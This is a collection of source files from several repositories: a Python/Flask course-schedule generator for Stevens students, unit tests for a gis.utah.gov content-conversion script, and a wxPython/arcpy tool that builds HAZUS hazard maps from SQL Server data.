{} # add the new class # add the new section with a list big_dict[course_big][course_section] = [] prev_course = this_course for meeting in course: # write the meetings to the section lists info = meeting.attrib try: day = info['Day'] startTime = info['StartTime'] endTime = info['EndTime'] # if the exact same meeting is already in the list if [day, startTime, endTime] in big_dict[course_big][course_section]: break # then dont add another! if len(day) == 1: # if this meeting describes one day big_dict[course_big][course_section].append( [day, startTime, endTime]) # add the meeting time else: # if multiple days happen at the same time for letter in day: # add one list for each meeting big_dict[course_big][course_section].append( [letter, startTime, endTime]) except KeyError: pass #TOGGLE below for list of courses that cause errors #global global_class_error_list #global_class_error_list.append(str(course.get('Section'))) return big_dict def isAllowed(classList1, classList2): # called from checkCombination() '''Given two meeting lists, check to see if there is a conflict, and return True if there is not''' # if class 2 ends before class 1 starts, or class 1 ends before class 2 # starts, then it's fine if (classList2[2] < classList1[1]) or (classList1[2] < classList2[1]): return True else: return False def checkCombination(courseDict, inputList): # called from findAllCombos() '''This will go through a combination list and see if it all works. If it does it will return a true value''' conflicts = 0 # initialize counters # find all combinations of size 2 from the inputList for thisCombo in itertools.combinations(inputList, 2): # comparison one in the item in the list we are on now comp1 = thisCombo[0] # seperate the section and the course, different if its a lecture if len(comp1) == 9: course1 = comp1[0:8] section1 = comp1[8:] else: course1 = comp1[0:7] section1 = comp1[7:] comp2 = thisCombo[1] # comparison two is the next item in the list # seperate the section and the course, different if its a letter if len(comp2) == 9: course2 = comp2[0:8] section2 = comp2[8:] else: course2 = comp2[0:7] section2 = comp2[7:] # check one is the list of meetings for course1 section1 check1 = courseDict[course1][section1] # check two is the list of meetings for course2 section2 check2 = courseDict[course2][section2] for meeting1 in check1: for meeting2 in check2: # if the meetings are on the same day... if meeting1[0] == meeting2[0]: # if there is no conflicts do nothing if (isAllowed(meeting1, meeting2) == True): pass # if there is a conflict, add to the conflict counter else: conflicts = conflicts + 1 if conflicts == 0: # if there were no conflicts, return true return True #return False #maybe this should be here? def findAllCombos(courseDict, callNumbers): # called from schedule() '''This function goes through the nested courses, stores lists of all possible combinations of courses, and prints them''' bigList = [] # list of lists of courses and sections goodCombos = [] # store all the good combinations badCombos = [] # store the bad combinations possibilities = "" # make a list of lists with the small lists being lists of possible # sections for one course for course in courseDict: courseList = [] for section in courseDict[course]: courseList.append(str(course + section)) bigList.append(courseList) combos = 0 # initialize the counter # find all combinations of one section of each class allCombos = list(itertools.product(*bigList)) for combo in allCombos: combos = combos + 1 # see if the combo works and add to apppropriate list checkCombination(courseDict, combo) if checkCombination(courseDict, combo) == True: goodCombos.append(combo) else: badCombos.append(combo) possibilities = {} # possibilities['totalCombos']=str(combos) # possibilities['goodCombos']=str(goodCombos) comboCounter = 1 for x in goodCombos: urlPart = [] possibilities[comboCounter] = {} for course in x: urlPart.append(callNumbers[str(course)]) # format url url = 'https://web.stevens.edu/scheduler/#' + SEMESTER + '=' for callNumber in urlPart: url = url + str(callNumber) + "," url = url[:-1] possibilities[comboCounter]['url'] = str(url) possibilities[comboCounter]['list'] = str(x) comboCounter = comboCounter + 1 return possibilities def schedule(course_list): """ Given a list of courses, return a dictionary of the possible schedules ['BT 353','CS 135','HHS 468','BT 181','CS 146','CS 284'] --> {1: {'url': 'https://web.stevens.edu/scheduler/#2015F=10063,10486,10479,11840,12011,11995,10482,10487', 'list': "('BT 181A', 'CS 284A', 'CS 135A', 'CS 135LB', 'BT 353C', 'HHS 468EV', 'CS 146B', 'CS 284RA')"}, 2: {'url': 'https://web.stevens.edu/scheduler/#2015F=10063,10486,10479,11840,12011,11995,10482,12166', 'list': "('BT 181A', 'CS 284A', 'CS 135A', 'CS 135LB', 'BT 353C', 'HHS 468EV', 'CS 146B', 'CS 284RB')"}, 3: {'url': 'https://web.stevens.edu/scheduler/#2015F=10063,10486,10479,11840,12012,11995,10482,10487', 'list': "('BT 181A', 'CS 284A', 'CS 135A', 'CS 135LB', 'BT 353D', 'HHS 468EV', 'CS 146B', 'CS 284RA')"}, 4: {'url': 'https://web.stevens.edu/scheduler/#2015F=10063,10486,10479,11840,12012,11995,10482,12166', 'list': "('BT 181A', 'CS 284A', 'CS 135A', 'CS 135LB', 'BT 353D', 'HHS 468EV', 'CS 146B', 'CS 284RB')"}} """ print course_list url = 'https://web.stevens.edu/scheduler/core/' + SEMESTER + '/' + SEMESTER + '.xml' urllib.urlretrieve(url, 'courses.xml') tree = etree.parse('courses.xml') os.remove('courses.xml') root = tree.getroot() root = cleanupCourses(root, course_list) root = cleanupElements(root) root = fixSpacing(root) root = fixTimeFormat(root) call_numbers = getCallNums(root) big_dict = getBigDict(root) all_combos = findAllCombos(big_dict, call_numbers) return all_combos if __name__ == '__main__': print schedule(['CS 442', 'CS 392', 'CS 519', 'MA 331']) ``` #### File: sitstuff/src/views.py ```python from flask import Flask, render_template, request, make_response, redirect, session, jsonify from src import app ####################### # Static pages # # and errors # ####################### @app.route('/') @app.route('/index') def index(): """ Returns the home page """ resp = make_response(render_template("index.html", title='Home')) return resp @app.route('/donate') def donate(): return render_template("donate.html", title='Donate') @app.errorhandler(500) def internal_error(error): return render_template('505.html'), 505 @app.errorhandler(404) def not_found(error): return render_template('404.html'), 404 @app.errorhandler(403) def forbidden_error(error): return render_template('403.html'), 403 ####################### # Course info # ####################### from models import dbtools @app.route('/courses') def courses(): db = dbtools.CourseDB('src/models/course_info.db', 'courses') courses = db.get_HTML() depts = db.get_depts() db.close_db() resp = render_template('courses.html', title='Courses', courses=courses, letter_links=depts) return resp ####################### # Scheduling # ####################### from models import scheduler import json PER_PAGE = 10 AMOUNT_OF_COURSES = 10 @app.route('/sched_entry') def how_many_post(): """ Goes to form with AMOUNT_OF_COURSES text boxes to input courses to schedule, form action=/schedules, method=POST """ default_courses = ['CS 442', 'CS 392', 'CS 519', 'MA 331'] resp = make_response(render_template( "sched_entry.html", quantity=AMOUNT_OF_COURSES, title='Scheduler', default_vals=default_courses)) resp.set_cookie('course_combos', '', expires=0) return resp @app.route('/schedules', methods=['GET','POST']) def my_form_post(): """ Gets input from form, puts it in a list, gets the schedules, send JSON of course combinations and send then to /sched as a cookie """ text_list = [] #make list of form inputs for i in range(1, AMOUNT_OF_COURSES + 1): form_num = 'text' + str(i) text_list.append(request.form[form_num]) #remove items with no input, generate string of courses final_list = [] for text in text_list: if not text == "": final_list.append(text) courses_str = "" for course in final_list[:-1]: courses_str += (str(course) + ',') courses_str += str(final_list[-1]) courses_str = courses_str.upper() #turn string of courses entered into list c_list = courses_str.split(',') #get the schedules #print "\nCourse list:" #print str(c_list) + "\n" my_combos = scheduler.schedule(c_list) resp = make_response(redirect('/sched')) resp.set_cookie('course_combos', '', expires=0) resp.set_cookie('course_combos', json.dumps(my_combos)) return resp @app.route('/get_combos', methods=['GET']) def getCombosAPI(): """ Upon a GET request containing csv course names in a query string... Find the combos and send them as JSON """ all_args = request.args.lists() course_list = all_args[0][1][0].split(",") u_COURSE_LIST = map((lambda x: x.upper()), course_list)#make all caps just in case COURSE_LIST = map( str, u_COURSE_LIST)#unicode list -> list of python strs combos = scheduler.schedule(COURSE_LIST) return jsonify(combos) def getCombosForPage(page_num, per_page, count_of_combos, combos): """Returns the set of combos for the current page""" combos_start = (per_page * (page_num - 1)) + 1 combos_end = combos_start + per_page these_combos = {} for key in range(combos_start, combos_end): try: # if new dict is not an int schedules are not sorted on the page these_combos[key] = combos[str(key)] except KeyError: pass return these_combos def isLastPage(page_num, count_of_combos, per_page): """Return True if this is the last page in the pagination""" if count_of_combos <= (page_num * per_page): return True return False @app.route('/sched/', defaults={'page': 1}) @app.route('/sched/page/<int:page>') def scheduleMe(page): """ Display schedules as links and iframes """ querystring_combos = request.cookies.get('course_combos') if not querystring_combos: return render_template('404.html'), 404 combos = json.loads(querystring_combos) #print querystring_combos count = len(combos) pagination_needed = count > PER_PAGE this_page_combos = combos if pagination_needed: this_page_combos = getCombosForPage(page, PER_PAGE, count, combos) last_page = isLastPage(page, count, PER_PAGE) if not this_page_combos and page != 1: return render_template('404.html'), 404 return render_template("sched.html", title="Scheduler", combos=this_page_combos, combo_amount=str(count), page=page, last_page=last_page, pagination=pagination_needed) ######################## # Random stuff # ######################## ```
{ "source": "joshgroeneveld/gis.utah.gov", "score": 3 }
#### File: gis.utah.gov/scripts/tests.py ```python import unittest from os.path import dirname, join import cleanser import UpdateYaml import yaml #: run with python -m unittest discover scripts class TestCleanser(unittest.TestCase): def test_update_image_url(self): test = '<p>[image title="Students watch a portion of "The Geospatial Revolution" to learn about GIS." size="medium" align="left" icon="zoom" lightbox="true" quality="100"]/gallery/agrc-general/gis_day_slcc_2011.jpg[/image]For' valid = '<p><img src="{{ "/images/gallery/agrc-general/gis_day_slcc_2011.jpg" | prepend: site.baseurl }}" class="inline-text-left" />For' self.assertEqual(cleanser.update_image_tag(test), valid) def test_update_gallery_links(self): # self.fail('write a test') pass def test_update_css_links(self): # self.fail('write a test') pass def test_update_page_links(self): # self.fail('write a test') pass def test_update_download_asset_links(self): # self.fail('write a test') pass def test_update_data_page_buttons(self): test = '<a href="ftp://ftp.agrc.utah.gov" class="button medium white"><span class="button-text">Download Locators</span></a>' valid = '<a href="ftp://ftp.agrc.utah.gov" class="button medium white"><span class="button-text">Download Locators</span></a>' self.assertEqual(cleanser.update_data_download_button(test), valid) def test_captions(self): test = '<div class="caption caption--right"><img class="size-full wp-image-4794" src="{{ "/images/AddPointsGC2.png" | prepend: site.baseurl }}" alt="ChangeMeLarge"/><figcaption class="caption__text">Concept of an Address Locator</figcaption></div>' valid = '<div class="caption caption--right"><img class="size-full wp-image-4794" src="{{ "/images/AddPointsGC2.png" | prepend: site.baseurl }}" alt="ChangeMeLarge"/><figcaption class="caption__text">Concept of an Address Locator</figcaption></div>' self.assertEqual(cleanser.update_caption(test), valid) test = '<div class="caption caption--right"><img class="size-full wp-image-4794" src="{{ "/images/AddPointsGC2.png" | prepend: site.baseurl }}" alt="ChangeMeLarge"/></div>' valid = '<div class="caption caption--right"><img class="size-full wp-image-4794" src="{{ "/images/AddPointsGC2.png" | prepend: site.baseurl }}" alt="ChangeMeLarge"/></div>' self.assertEqual(cleanser.update_caption(test), valid) test = '<p>[caption id="attachment_18156" align="alignright" width="300" caption="The pendulum swings back and forth..."]<a href="{{ "/downloads/Screen-Shot-2015-11-27-at-12.39.23-PM.png" | prepend: site.baseurl }}"><img src="{{ "/images/Screen-Shot-2015-11-27-at-12.39.23-PM-300x220.png" | prepend: site.baseurl }}" alt="" title="The pendulum swings back and forth..." width="300" height="220" /></a>[/caption]</p>' valid = '<div class="caption caption--right"><a href="{{ "/downloads/Screen-Shot-2015-11-27-at-12.39.23-PM.png" | prepend: site.baseurl }}"><img src="{{ "/images/Screen-Shot-2015-11-27-at-12.39.23-PM-300x220.png" | prepend: site.baseurl }}" alt="" title="The pendulum swings back and forth..." width="300" height="220" /></a><figcaption class="caption__text">The pendulum swings back and forth...</figcaption></div>' self.assertEqual(cleanser.update_caption(test), valid) def test_half_columns(self): test = '''<div class="grid"><div class="grid__col grid__col--1-of-2"> <h3>Overview</h3> </div> <div class="grid__col grid__col--1-of-2"> <h3>SGID Datasets</h3> </div></div>''' valid = '''<div class="grid"><div class="grid__col grid__col--1-of-2"> <h3>Overview</h3> </div> <div class="grid__col grid__col--1-of-2"> <h3>SGID Datasets</h3> </div></div>''' self.assertEqual(cleanser.update_columns(test), valid) def test_divider(self): test = '<div class="divider"></div>' valid = '<div class="divider"></div>' self.assertEqual(cleanser.update_divider(test), valid) test = '<div class="divider-padding"></div>' valid = '<div class="divider-padding"></div>' self.assertEqual(cleanser.update_divider(test), valid) test = '<div class="divider-padding"></div>' self.assertEqual(cleanser.update_divider(test), valid) def test_icons(self): test = '<span class="icon-text icon-download"><a title="Download available HRO imagery" href="https://raster.utah.gov/?catGroup=HRO%202012%20(12.5cm),HRO%202012%20(1ft),HRO%202009%20(25cm),HRO%202006%20(25cm),HRO%202003%20(30cm)&title=Utah%20HRO%20Imagery">HRO Orthophotography Interactive Map</a></span><br />' valid = '<span class="icon-text icon-download"><a title="Download available HRO imagery" href="https://raster.utah.gov/?catGroup=HRO%202012%20(12.5cm),HRO%202012%20(1ft),HRO%202009%20(25cm),HRO%202006%20(25cm),HRO%202003%20(30cm)&title=Utah%20HRO%20Imagery">HRO Orthophotography Interactive Map</a></span><br />' self.assertEqual(cleanser.update_icons(test), valid) test = '<p><span class="icon-text icon-calendar">Last Update: March, 2013</span><br />' valid = '<p><span class="icon-text icon-calendar">Last Update: March, 2013</span><br />' self.assertEqual(cleanser.update_icons(test), valid) def test_tables(self): test = ' ' valid = ' ' self.assertEqual(cleanser.update_tables(test), valid) test = '<div class="table-style">' valid = '<div class="table-style">' self.assertEqual(cleanser.update_tables(test), valid) test = '<div class="table-style">' self.assertEqual(cleanser.update_tables(test), valid) test = '<div class="table-style">' self.assertEqual(cleanser.update_tables(test), valid) test = '</div>' valid = '</div>' self.assertEqual(cleanser.update_tables(test), valid) def maybelater_tabs(self): test = '<p><br />' valid = '<p><br />' self.assertEqual(cleanser.update_tabs(test), valid, msg='1') test = '<p><br />' self.assertEqual(cleanser.update_tabs(test), valid, msg='2') test = '<p></p>' valid = '<p></p>' self.assertEqual(cleanser.update_tabs(test), valid, msg='3') test = '<p><br />' valid = '<p><br />' self.assertEqual(cleanser.update_tabs(test), valid, msg='4') test = '<p> </p>' valid = '<p> </p>' self.assertEqual(cleanser.update_tabs(test), valid) test = '<p></p>' valid = '<p></p>' self.assertEqual(cleanser.update_tabs(test), valid, msg='6') test = 'This dataset was last updated in 2002.</p>' valid = 'This dataset was last updated in 2002.</p>' self.assertEqual(cleanser.update_tabs(test), valid) test = '<h5 class="tab-title">Contact</h5><br />' valid = '<h5 class="tab-title">Contact</h5>' self.assertEqual(cleanser.update_tabs(test), valid) test = '<h5 class="tab-title">Contact</h5><br />' self.assertEqual(cleanser.update_tabs(test), valid) def create_data_package_page(self): from os.path import join, dirname file_path = join(dirname(__file__), 'data', 'index.html') with open(file_path, 'r') as test_file, open(file_path.replace('index.html', 'testoutput.html'), 'wb') as updated: file_content = [] for line_content in test_file.readlines(): file_content.append(line_content) replaced = cleanser.update_tabs(file_content) updated.writelines(replaced) class TestYaml(unittest.TestCase): def test_yaml_key_removal(self): front_matter = yaml.load(''' layout: page status: publish published: true title: Undreground Storage Tanks author: display_name: <NAME> login: <NAME> email: <EMAIL> url: '' author_login: <NAME> author_email: <EMAIL> wordpress_id: 1895 wordpress_url: http://gis.utah.gov/?page_id=1895 date: '2011-08-31 23:58:01 -0600' date_gmt: '2011-09-01 05:58:01 -0600' categories: [] tags: - sgid - Data - utah - gis - map - mapping - dataset - download - agrc - layer - shapefile - geodatabase - metadata - shp - gdb - kml - lyr - digital - geographic - information - database - state - statewide''') valid = set(['status', 'published', 'layout', 'title', 'author', 'date', 'categories', 'tags']) valid_sub_keys = set(['display_name', 'email']) front_matter = UpdateYaml.prune_keys(front_matter) self.assertSetEqual(set(front_matter.keys()), valid) self.assertSetEqual(set(front_matter['author'].keys()), valid_sub_keys) def test_yaml_tag_removal(self): front_matter = yaml.load(''' layout: page status: publish published: true title: Undreground Storage Tanks author: display_name: <NAME> login: <NAME> email: <EMAIL> url: '' author_login: <NAME> author_email: <EMAIL> wordpress_id: 1895 wordpress_url: http://gis.utah.gov/?page_id=1895 date: '2011-08-31 23:58:01 -0600' date_gmt: '2011-09-01 05:58:01 -0600' categories: [] tags: - sgid - Data - utah - gis - map - mapping - Geocoding - geocoding - agrc - layer - shapefile - geodatabase - metadata - shp - gdb - kml - lyr - digital - geographic - deq - information - database - state - statewide''') valid = ['data', 'geocoding', 'deq'] valid.sort() tags = UpdateYaml.prune_tags(front_matter) self.assertListEqual(tags, valid) def test_pluck_yaml(self): f = join(dirname(__file__), 'data', 'yaml.html') with open(f, 'r') as html: front_matter = UpdateYaml.pluck_yaml(html) self.assertIsNotNone(front_matter) def test_pluck_content(self): f = join(dirname(__file__), 'data', 'yaml.html') with open(f, 'r') as html: content = ''.join(UpdateYaml.pluck_content(html)) self.assertEqual(content, '''<h1>This is the content of the file</h1> <p>pretty cool</p> <p>ok bye</p> ''') ```
{ "source": "joshgroeneveld/hazus-map-generator", "score": 3 }
#### File: joshgroeneveld/hazus-map-generator/HAZUS_Map_Automation.py ```python import sys import traceback import wx import os import logging import shutil import sqlinstances import pyodbc import inspect from arcpy import mapping from arcpy import management from arcpy import da # 1. Initialize wxpython window class MainFrame(wx.Frame): logfile = None def __init__(self, parent): wx.Frame.__init__(self, parent, size=wx.Size(-1, -1)) if self.logfile is None: self.logfile = 'C:\\Temp\\HAZUS_Map_Generator_Log.txt' self.__initlogging() self.main_panel = wx.Panel(self, wx.ID_ANY) self.SetTitle("HAZUS Map Generator version 0.1.0") self.sb = self.CreateStatusBar() self.sb.SetStatusText("Please select a folder to store your maps.") self.logger.info("Script initiated") label_font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT) label_font.MakeBold() label_font.SetPointSize(14) normal_font = wx.Font(10, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL) box = wx.BoxSizer(wx.VERTICAL) # the welcome box welcome_staticbox = wx.StaticBox(self.main_panel, -1, "Welcome!", size=(-1, -1)) welcome_staticbox.SetOwnFont(label_font) welcome_sizer = wx.StaticBoxSizer(welcome_staticbox) # welcome text welcomemessage = """The HAZUS Map Generator creates a series of maps of your choice based on a HAZUS analysis. This tool assumes that you already have a HAZUS study region and that HAZUS has already finished analyzing the hazards in your study region. Select your HAZUS Server and the study region from the list below to get started.""" welcome_text = wx.StaticText(self.main_panel, -1, welcomemessage) welcome_text.SetFont(normal_font) welcome_sizer.Add(welcome_text) # the output folder picker box output_directory_staticbox = wx.StaticBox(self.main_panel, -1, "Select a folder to store the maps", size=(-1, -1)) output_directory_staticbox.SetOwnFont(label_font) output_directory_sizer = wx.StaticBoxSizer(output_directory_staticbox) # Set up the menu to choose a directory from the system self.output_directory_dialog_button = wx.Button(output_directory_staticbox, label="Browse...", size=wx.Size(-1, -1)) self.output_directory_dialog_button.SetFont(normal_font) output_directory_sizer.Add(self.output_directory_dialog_button) self.output_directory = "" self.scenario_dir = "" self.scenario_data_dir = "" self.study_region_data = "" self.output_directory_dialog_button.Bind(wx.EVT_BUTTON, self.select_output_directory) # the server and database info box self.serverinfo_staticbox = wx.StaticBox(self.main_panel, -1, "Server Information and Database Information", size=(-1, -1)) self.serverinfo_staticbox.SetOwnFont(label_font) server_and_db_sizer = wx.StaticBoxSizer(self.serverinfo_staticbox, orient=wx.VERTICAL) # Create a drop down menu to select the name of the HAZUS Server server_box = wx.BoxSizer(wx.HORIZONTAL) server_and_db_sizer.Add(server_box) self.hazus_server_label = wx.StaticText(server_and_db_sizer.GetStaticBox(), -1, "Select your HAZUS Server") self.hazus_server_label.SetFont(normal_font) server_box.Add(self.hazus_server_label) server_box.Add(wx.Size(20, 10)) self.hazus_server_choices = ["Server 1", "Server 2"] self.hazus_server_list = wx.ComboBox(self.serverinfo_staticbox, -1, "", choices=self.hazus_server_choices, size=wx.Size(300, -1)) self.hazus_server_list.SetFont(normal_font) server_box.Add(self.hazus_server_list) self.hazus_server = "" self.hazus_server_list.Bind(wx.EVT_COMBOBOX, self.select_hazus_server) # the database info sizer -- nests under the server and database info box database_box = wx.BoxSizer(wx.HORIZONTAL) server_and_db_sizer.Add(database_box) # Create a drop down menu to select the HAZUS Study Region self.hazus_db_list = wx.StaticText(server_and_db_sizer.GetStaticBox(), -1, "Select your Study Region") self.hazus_db_list.SetFont(normal_font) database_box.Add(self.hazus_db_list) database_box.Add(wx.Size(20, 10)) self.db_choices = ["Study Region 1", "Study Region 2"] self.db_list = wx.ComboBox(self.serverinfo_staticbox, -1, "", choices=self.db_choices, size=wx.Size(300, -1)) self.db_list.SetFont(normal_font) database_box.Add(self.db_list) self.hazus_db = "" self.db_list.Bind(wx.EVT_COMBOBOX, self.select_hazus_db) # the create maps box self.create_maps_staticbox = wx.StaticBox(self.main_panel, -1, "Choose your maps", size=wx.Size(-1, -1)) self.create_maps_staticbox.SetFont(normal_font) self.create_maps_staticbox.SetOwnFont(label_font) create_maps_sizer = wx.StaticBoxSizer(self.create_maps_staticbox, orient=wx.HORIZONTAL) maps_to_select_box = wx.BoxSizer(wx.VERTICAL) map_selection_buttons = wx.BoxSizer(wx.VERTICAL) selected_maps_box = wx.BoxSizer(wx.VERTICAL) # add the three vertical sizers to the horizontal container sizer create_maps_sizer.Add(maps_to_select_box) create_maps_sizer.Add(map_selection_buttons, 0, wx.ALL | wx.CENTER, 30) create_maps_sizer.Add(selected_maps_box) # add static text and a list box to the maps to select sizer self.map_selection_label = wx.StaticText(create_maps_sizer.GetStaticBox(), -1, "Select the maps to create") self.map_selection_label.SetFont(normal_font) maps_to_select_box.Add(self.map_selection_label) maps_to_select_box.Add(wx.Size(20, 10)) # Create a list box with all of the potential maps that the user can select self.map_choices = ["Direct Economic Loss", "Shelter Needs", "Utility Damage", "Building Inspection Needs", "Estimated Debris", "Highway Infrastructure Damage", "Impaired Hospitals", "Water Infrastructure Damage", "Search and Rescue Needs"] self.map_list = wx.ListBox(create_maps_sizer.GetStaticBox(), -1, choices=self.map_choices, size=wx.Size(-1, -1), style=wx.LB_EXTENDED | wx.LB_SORT) self.map_list.SetFont(normal_font) maps_to_select_box.Add(self.map_list) maps_to_select_size = self.map_list.GetSize() # add buttons for the user to add and remove maps from the current selection self.add_maps_to_selection = wx.Button(self.create_maps_staticbox, label="Add -->", size=wx.Size(-1, -1)) self.add_maps_to_selection.SetFont(normal_font) self.remove_maps_from_selection = wx.Button(self.create_maps_staticbox, label="Remove <--", size=wx.Size(-1, -1)) self.remove_maps_from_selection.SetFont(normal_font) map_selection_buttons.Add(self.add_maps_to_selection) map_selection_buttons.Add(wx.Size(20, 10)) map_selection_buttons.Add(self.remove_maps_from_selection) self.add_maps_to_selection.Bind(wx.EVT_BUTTON, self.select_maps) self.remove_maps_from_selection.Bind(wx.EVT_BUTTON, self.deselect_maps) # add static text and a list box to the selected maps sizer self.selected_map_label = wx.StaticText(create_maps_sizer.GetStaticBox(), -1, "Selected maps") self.selected_map_label.SetFont(normal_font) selected_maps_box.Add(self.selected_map_label) selected_maps_box.Add(wx.Size(20, 10)) self.selected_map_choices = [] self.selected_maps = [] self.selected_map_list = wx.ListBox(create_maps_sizer.GetStaticBox(), -1, style=wx.LB_EXTENDED | wx.LB_SORT, choices=self.selected_map_choices, size=maps_to_select_size) self.selected_map_list.SetFont(normal_font) selected_maps_box.Add(self.selected_map_list) self.deselect_map_choices = [] self.map_extent = {} # Disable the map selection lists until the user selects a server and a database self.map_list.Disable() self.selected_map_list.Disable() # create a horizontal sizer to hold the Go and Reset buttons primary_button_sizer = wx.BoxSizer(wx.HORIZONTAL) # add in the buttons self.create_maps = wx.Button(self.main_panel, label="Go!", size=wx.Size(150, 100)) self.create_maps.SetFont(label_font) self.create_maps.SetBackgroundColour(wx.Colour(44,162,95)) primary_button_sizer.Add(self.create_maps, 0, wx.ALL, 20) self.Bind(wx.EVT_BUTTON, self.copy_template, self.create_maps) # Create a button that resets the form self.reset_button = wx.Button(self.main_panel, label="Reset", size=wx.Size(150, 100)) self.reset_button.SetFont(label_font) primary_button_sizer.Add(self.reset_button, 0, wx.ALL, 20) # self.Bind(wx.EVT_BUTTON, self.OnReset, self.resetButton) box.Add(welcome_sizer, 0.5, wx.EXPAND) box.Add(output_directory_sizer, 0.5, wx.EXPAND) box.Add(server_and_db_sizer, 0.5, wx.EXPAND) box.Add(create_maps_sizer, 2, wx.EXPAND) box.Add(primary_button_sizer, 1, wx.EXPAND) # Set the panel to be the same size as the main sizer, then set the frame to be the # same size as the panel self.main_panel.SetSizerAndFit(box) panel_size = self.main_panel.GetSize() self.SetSize(panel_size) # 2. Select output directory def select_output_directory(self, event): """This function allows the user to choose an output directory and then generates a list of available SQL Server instances for the user to select.""" dlg = wx.DirDialog(self, "Choose a directory:", style=wx.DD_DEFAULT_STYLE) dlg.Show() if dlg.ShowModal() == wx.ID_OK: self.output_directory = dlg.GetPath() self.sb.SetStatusText("You chose %s" % self.output_directory) self.logger.info("Output directory: " + self.output_directory) dlg.Destroy() self.hazus_server_choices = sqlinstances.list_sql_servers(self) self.hazus_server_list.Clear() for server in self.hazus_server_choices: self.hazus_server_list.Append(server) self.sb.SetStatusText("Please select your HAZUS Server") # 3. Select HAZUS SQL Server instance def select_hazus_server(self, event): """This function allows the user to select a HAZUS server (SQL Server instance) from a drop down list, and then populates a drop down list of HAZUS study regions (databases) for the user to select.""" self.hazus_server = self.hazus_server_list.GetValue() self.sb.SetStatusText("You chose %s" % self.hazus_server) self.logger.info("HAZUS Server: " + str(self.hazus_server)) # Populate the drop down menu of databases in the server cxn = pyodbc.connect('DRIVER={SQL Server};SERVER=%s;DATABASE=master;UID="hazuspuser";' 'PASSWORD="<PASSWORD>";Trusted_Connection=yes' % str(self.hazus_server)) cursor = cxn.cursor() cursor.execute("select name from sys.databases") rows = cursor.fetchall() self.db_list.Clear() for row in rows: self.db_list.Append(row[0]) self.sb.SetStatusText("Please select your HAZUS Study Region") cxn.close() # 4. Select HAZUS study region (SQL Server database) def select_hazus_db(self, event): """This function allows the user to select a HAZUS Study Region (SQL Server Database) from a drop down list, then enables the user to select the set of maps to generate.""" self.hazus_db = self.db_list.GetValue() self.sb.SetStatusText("You chose %s" % self.hazus_db) self.logger.info("HAZUS Database: " + str(self.hazus_db)) # Enable the map selection lists self.map_list.Enable() self.selected_map_list.Enable() self.sb.SetStatusText("Please choose the maps you want to create") # 5. Choose map or maps from list of templates and add to list of maps to create def select_maps(self, event): """This function allows the user to select some or all of the available maps and add them to the list of maps to create.""" self.selected_map_choices = list(self.map_list.GetSelections()) # Add the selected maps to the selected list, and remove these selections from the # original list so that each map can only be selected once for s in self.selected_map_choices: selected_map = self.map_list.GetString(s) self.selected_maps.append(selected_map) self.map_choices.remove(selected_map) self.logger.info("Added " + str(selected_map) + " to selection") self.selected_map_list.Set(self.selected_maps) self.map_list.Set(self.map_choices) self.sb.SetStatusText("Click Go! to create maps or adjust your selections") def deselect_maps(self, event): """This function allows the user to revise the current map selection before creating the maps.""" self.deselect_map_choices = list(self.selected_map_list.GetSelections()) for d in self.deselect_map_choices: map_to_deselect = self.selected_map_list.GetString(d) self.map_choices.append(map_to_deselect) self.selected_maps.remove(map_to_deselect) self.logger.info("Removed " + str(map_to_deselect) + " from selection") self.selected_map_list.Set(self.selected_maps) self.map_list.Set(self.map_choices) self.sb.SetStatusText("Click Go! if you are happy with your selections") # 6. Run the script # 6a. Create the directory structure in output directory # Copy the template shakemap geodatabase to a Data folder in the # same directory as the earthquake name def copy_template(self, event): """This function copies a template study region geodatabase and the layer files into the selected output directory.""" temp = inspect.stack()[0][1] script_dir = temp.replace('HAZUS_Map_Automation.py', "Template") self.scenario_dir = self.output_directory + "\\" + self.hazus_db self.scenario_data_dir = self.scenario_dir + "\\Scenario_Data" self.study_region_data = self.scenario_data_dir + "\\Data\\StudyRegionData.mdb" shutil.copytree(script_dir, self.scenario_data_dir) self.sb.SetStatusText("Copied template data and maps to " + self.scenario_data_dir) self.logger.info("Copied template data and maps to " + self.scenario_data_dir) output_dirs = ["Summary_Reports", "JPEG", "PDF"] os.chdir(self.scenario_dir) for new_dir in output_dirs: os.mkdir(new_dir) self.sb.SetStatusText("Created output dirs in: " + self.scenario_dir) self.connect_to_db() # 6.b Extract data from SQL Server # Use pyodbc to connect to SQL Server def connect_to_db(self): """This function establishes a connection to the selected HAZUS database to extract data for the selected maps.""" connection_str = """ DRIVER={SQL Server}; SERVER=%s; DATABASE=%s; UID=hazuspuser; PWD=<PASSWORD>_01""" % (self.hazus_server, self.hazus_db) conn = pyodbc.connect(connection_str) self.sb.SetStatusText("Established connection to: " + self.hazus_db) self.logger.info("Established connection to: " + self.hazus_db) cursor = conn.cursor() maps_to_create = [] for selected_map in self.selected_maps: self.logger.info("Selected map list includes: " + selected_map) lower_case = selected_map.lower() no_spaces = lower_case.replace(" ", "_") maps_to_create.append(str(no_spaces)) self.determine_map_extent(cursor) # Call a function to extract the data needed for each map # For example, if building inspection needs is one of the selected maps, # the getattr() statement below generates the following: # getattr(self, building_inspection_needs)(), which is equivalent to: # self.building_inspection_needs() for m in maps_to_create: getattr(self, m)(cursor) cursor.close() conn.close() self.sb.SetStatusText("Closed connection to the HAZUS database") def determine_map_extent(self, cursor): """This function accepts a cursor from pyodbc to call the SQL Server database and queries the database for all tracts in the current study region. These tracts are then passed to arcpy to calculate the extent of these tracts. This extent is returned out of the function and passed to each of the maps selected.""" study_region_tracts_sql = """ SELECT Tract FROM hzTract """ cursor.execute(study_region_tracts_sql) study_region_tracts = cursor.fetchall() tracts_to_select = [] for sr_tract in study_region_tracts: tracts_to_select.append(sr_tract[0]) # Convert list of tracts into a string to add to a selection query str_tracts = str(tracts_to_select) str_tracts = str_tracts.replace("[", "") str_tracts = str_tracts.replace("]", "") tract_fc = mapping.Layer(self.scenario_data_dir + "\\Data\\TotalEconLoss.lyr") out_fl = self.scenario_data_dir + "\\Data\\Selected_Tracts.lyr" management.MakeFeatureLayer(tract_fc, "temp_lyr") lyr = mapping.Layer("temp_lyr") lyr.definitionQuery = "[Tract] in (" + str_tracts + ")" lyr.saveACopy(out_fl) selection_layer = mapping.Layer(out_fl) # Get extent of feature layer tract_extent = selection_layer.getExtent() # Return extent out of function as dictionary self.map_extent["XMin"] = tract_extent.XMin self.map_extent["XMax"] = tract_extent.XMax self.map_extent["YMin"] = tract_extent.YMin self.map_extent["YMax"] = tract_extent.YMax self.sb.SetStatusText("Determined map extent") # 6.c Create table queries to get only the data we need # For each possible map, create a function to call the 